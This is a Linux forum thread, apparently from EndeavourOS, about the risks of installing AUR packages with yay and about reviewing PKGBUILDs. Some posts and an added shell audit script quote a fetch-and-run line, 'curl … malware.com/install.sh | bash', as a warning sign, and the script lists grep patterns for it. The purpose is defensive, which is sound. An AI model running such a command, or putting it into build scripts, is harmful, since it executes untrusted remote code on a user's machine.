Can We Have a Tutorial on Answering AUR/Update Options

Because PKGBUILD is a shell script, which anyone can upload to the AUR. What you are doing when you’re building foreign packages from the AUR is running scripts on your computer written by random strangers online. And when you are doing it with yay you are automating the process. Just consider the security implications of that…

What makes the AUR safe to use is its transparency – you can know exactly what goes into the package and where it is sourced from – but that works only if you understand the process and actually check the build files.

Sure, I understand that point, but what I don’t understand is why they have issues with installing a pkg that is in the AUR. I don’t know what packages they are trying to install, but any that I have used I have had zero issues with.

Edit: I just pick ones I can trust like btrfs-assistant :rofl:

Do you mean the OP?

From my side no problem installing, but like OP I would like to know more about what is being asked and the implications of what one chooses when installing packages via AUR using the yay helper. It’s easy to click yes or enter and install, but it would be better to know what we are doing. So in a way the question asked was to find a good guide to understand what is going on when installing an AUR package. I am probably formulating that wrong, but I think that’s what the OP asked.

I am at least reading the package build script and checking sources where things come from… But it never went beyond that until now.

Here is a gentle, step by step guide:

1 Like

I guess if I have no idea about the package I might be curious and/or cautious. But I use only a few well known packages that are trustworthy, so I don’t need to change any of the defaults.

That’s always a good idea, of course. But that doesn’t mean you can be completely careless. AUR packages get orphaned all the time, and then random people can take them over.

While these things almost never happen, I can easily imagine a situation where someone wanting to spread malware takes over a recently orphaned package that is very popular – these are the most tempting packages, of course. Naturally, such an attempt will get discovered very quickly, but if you’re unlucky and update the package before that… Well, you might be mining crypto for months before you notice anything.

Well, I don’t know how a person who has no pkg build skills is going to know if it’s good or not.

Just common sense and the most basic knowledge of shell scripting is required.

I also have a guide for that:

I will spend some time looking this over and see what I learn.

Edit: I don’t really have any skills with shell scripting, but I understand how some things work.

I think that should be more than enough. You only need to know enough to be able to take a look at a script and see that it is not doing anything fishy. E.g. if you see a line like

curl -s http://malware.com/install.sh | bash

you should certainly flag that package. You don’t need to be a shell programmer for that.

1 Like
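As an added example (not from this thread, and not part of yay or any EndeavourOS tooling): a small POSIX shell pre-build audit that greps a PKGBUILD for the kind of line the post above describes. The sample PKGBUILD is constructed here, and the patterns are my own heuristics meant to point a human at lines worth reading, not to replace reading the file.

```shell
#!/bin/sh
# Write a constructed sample PKGBUILD (not a real AUR package) to the path in $1.
# It contains the pipe-to-shell line quoted in the thread plus two weaker signs:
# a plain-http source and a checksum set to SKIP.
make_sample_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-app
pkgver=1.0
pkgrel=1
source=("http://example.invalid/example-app-1.0.tar.gz")
sha256sums=('SKIP')
build() {
  curl -s http://malware.com/install.sh | bash
}
EOF
}

# audit_pkgbuild FILE: print every matching line (with its line number) and
# return the number of rules that fired, so 0 means "nothing flagged".
# Rules (heuristics, assumed here, not an official checklist):
#   1. something downloaded and piped straight into a shell
#   2. source= entries fetched over plain http
#   3. checksum verification disabled with SKIP
#   4. sudo inside the build script (a PKGBUILD should never need root)
#   5. base64 decoding, a common way to hide a payload in plain sight
audit_pkgbuild() {
  hits=0
  for pat in \
    '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' \
    '^source.*http://' \
    '^(sha256|sha512|md5|b2)sums=.*SKIP' \
    '(^|[[:space:]])sudo[[:space:]]' \
    'base64[[:space:]]+(-d|--decode)'
  do
    if grep -nE "$pat" "$1"; then
      hits=$((hits + 1))
    fi
  done
  return $hits
}
```

Run it as `audit_pkgbuild ./PKGBUILD` from a cloned AUR directory before `makepkg`; a non-zero return just means there are lines to read, not that the package is malicious.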

Should be

curl -s http://windozemalware.com/install.sh | bash

1 Like

Oh. I mean I backup like photos and documents. Just not like my OS, there’s no real need. Chroot and fix is too easy to warrant it.

For actual things like photos I have a 4TB HDD with a second 4TB drive with a sabrent drive duplicator. So I save everything as a backup on drive 1 and monthly I attach the second drive and press play and it gets backed up redundantly.

2 Likes

I think I’ve said this before as well. I actually think yay should be removed, that way at least everyone needs to build one package. It would truly solidify EOS as intermediate instead of flirting with beginner syndrome all the time.

2 Likes

Studying it now :nerd_face:

I think that would be overkill. But I use mostly pacman anyways… That would build a barrier if you want to filter out absolute beginner users or get bad review criticism about the distro… Probably not a good idea from dev perspective, more troubleshooting and more questions in the forum could issue from that too perhaps.

1 Like

Glad I was so tongue-in-cheek, but I was pretty sure you backed up … something.
Thanks for sharing. It puts my backup systems to shame :grimacing:

Overkill to build one package? I think asking everyone to build one if not only one package so they know how is not overkill at all.

We already admit we’re not for absolute beginners. . . So why cater to them? And while this project has gained serious accolades, that’s never been the goal. Beginners are the loudest critics.

That’s one way to see it. That’s true about criticism and beginners and all.

I am just not in favor of removing yay just so the users have to build a package manually. Just my opinion. I agree that users should read the wiki and understand the AUR before using it :100:

Perhaps you are right, it could be a teaching moment, and filter out some users that are better off not using arch. But I don’t think that’s the eos way (we don’t want to exclude, even beginners).

I think EndeavourOS is perfectly fine for absolute first time Linux users, just not everyone. Only those who are willing to learn about their OS, use the terminal and are not lazy to RTFM.

Personally, I wouldn’t have any objection to removing yay from the repo.

3 Likes

Or a great teaching moment where folks can learn how to use the AUR. I’d rather have a walk through tutorial on welcome app to install yay and explain the AUR than to have the fiasco when pacman was updated last and yay broke, or a 2500+ thread on how to install grub.

I don’t see it as excluding anyone. But giving someone the keys to all the AUR and then asking them to learn how to use it afterwards is a little backwards, but it’s not my distro, just my opinion.

1 Like